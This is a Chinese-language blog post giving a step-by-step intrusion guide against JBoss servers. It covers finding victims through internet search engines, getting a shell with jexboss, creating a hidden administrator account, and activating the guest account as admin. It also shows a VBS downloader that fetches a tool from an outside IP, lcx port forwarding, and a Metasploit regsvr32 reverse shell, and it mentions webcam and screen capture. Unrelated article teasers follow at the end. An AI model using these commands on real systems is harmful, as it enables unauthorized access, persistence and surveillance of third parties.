jboss漏洞利用

JBOSS简介1、概念JBoss是一个管理EJB的容器和服务器，支持EJB 1.1、EJB 2.0和EJB3.0的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器，一般与Tomcat或Jetty绑定使用。2、优点JBoss是免费的，开放源代码J2EE的实现，通过LGPL许可证进行发布。JBoss需要的内存和硬盘空间比较小。安装非常简单。

xg_ren

3857人浏览 · 2018-01-24 10:44:40

xg_ren · 2018-01-24 10:44:40 发布

JBOSS简介

1、概念

JBoss是一个管理EJB的容器和服务器，支持EJB 1.1、EJB 2.0和EJB3.0的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器，一般与Tomcat或Jetty绑定使用。

2、优点

JBoss是免费的，开放源代码J2EE的实现，通过LGPL许可证进行发布。
JBoss需要的内存和硬盘空间比较小。
安装非常简单。先解压缩JBoss打包文件再配置一些环境变量就可以了。
JBoss能够”热部署”，部署BEAN只是简单拷贝BEAN的JAR文件到部署路径下就可以了。如果没有加载就加载它；如果已经加载了就自动更新。
JBoss与Web服务器在同一个Java虚拟机中运行，Servlet调用EJB不经过网络，从而大大提高运行效率，提升安全性能。
用户可以直接实施J2EE-EAR，而不是以前分别实施EJB-JAR和Web-WAR，非常方便。
Jboss支持集群

漏洞利用

1、利用工具

从github上下载jboss利用工具jexboss；python运行jexboss.py后接参数：-u后加链接；-host后接ip

2、寻找目标

利用钟馗之眼或fofa等进行jboss搜索；选择目标，利用工具进行扫描

3、getshell

利用工具进行ip或链接扫描后会自动写入一个shell，并返回给你，直接得到一个命令行

4、创建隐藏用户或激活guest用户

1.创建隐藏管理员用户

net user test$ test /add
net localgroup administrators test$ /add

2.激活guest用户

net user guest /active:yes
net user guest 1234
net localgroup administrators guest /add

5、端口转发

1.因为得到的shell处于一个内网中；所以想尝试端口转发到自己的vbs上
2.win cmd中下载端口转发工具

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >> dc.vbs   
echo xPost.Open "GET","http://45.32.62.186/lcx.txt",0 >> dc.vbs 
echo xPost.Send() >> dc.vbs 
echo Set sGet = CreateObject("ADODB.Stream") >> dc.vbs   
echo sGet.Mode = 3 >> dc.vbs 
echo sGet.Type = 1 >> dc.vbs   
echo sGet.Open() >> dc.vbs   
echo sGet.Write(xPost.responseBody) >> dc.vbs  
echo sGet.SaveToFile "C:/PACS/dcm4chee-mysql-2.14.5/bin/lcx.txt",2 >> dc.vbs

将txt文件转为exe文件
3. lcx端口转发

内网主机
lcx.exe -slave 对外主机ip 转发到的端口 内网主机ip 要转发的端口
对外主机
lcx.exe -listen 转发到的端口 接收端口（未占用）
外网访问
对外主机ip：接收的端口

或

对外的主机
lcx.exe -tran 转发到的端口 内网主机ip 要转发的端口 
外网访问
对外主机ip：转发到的端口

最后是失败的；还在找原因

6、msf利用win漏洞实现shell反弹

1.在vbs上安装msf工具
2.执行下列命令

search web_delivery  //列出漏洞利用模块
use exploit/windows/misc/regsvr32_applocker_bypass_server  //这个模块win7以上都通杀，但是360会拦截
set lhost ip
set lport 端口
exploit  // 会生成一个exp，将exp复制到win命令行执行，并会返回到本地一个session
sessions -i 返回的sessionid   //-i是调用sessionid的参数

得到一个反弹回来的shell，权限与你得到shell权限一样，可以输入shell进入cmd命令行；或help查看其它参数能执行其它功能;比如截对方的屏幕；打开对方摄像头等

3.提权

如果你得到的是一个低权限用户，可以通过bybass UAC 来提升到管理员权限，具体操作不在这篇介绍，等我再了解下会写专门的博客记录
虽然我们反弹回来shell，但是在目标机上打开了一个shell的进程，我们提权后可以将这个进程植入到一个目标机本身存在的进程中，如果该进程是system运行的，我们还可以提升到system权限

关于meterpreter的具体使用见后面的笔记；谢谢

向您推荐>>Eolink开发者社区

权威｜前沿｜技术｜干货｜国内首个API全生命周期开发者社区

更多推荐

深入理解 Mocha 测试框架：从零实现一个 Mocha

前言什么是自动化测试自动化测试在很多团队中都是Devops环节中很难执行起来的一个环节，主要原因在于测试代码的编写工作很难抽象，99%的场景都需要和业务强绑定，而且写测试代码的编写工作量往往比编写实际业务代码的工作量更多。在一些很多业务场景中投入产出比很低，适合写自动化测试的应该是那些中长期业务以及一些诸如组件一样的基础库。自动化测试是个比较大的概念，其中分类也比较多，比如单元测试，端对端测试，集

云原生

ELK实现containerd的容器日志采集展示【基于logging的全栈监测】

企业级ELK Stack构建介绍

云原生

(20200916 Solved)docker-compose up创建容器自动退出

问题描述如题，创建容器后自动退出了。并且docker start container无效解决方案原因是缺失了控制终端的配置，需要在docker-compose.yml中增加tty:true ，有时候这样也不行，需要再增加一个command:/bin/bash，命令不一定是这个，需要是一个不会退出的命令，然后用-d后台启动容器。Referencesdocker-compose启动容器后自动退出...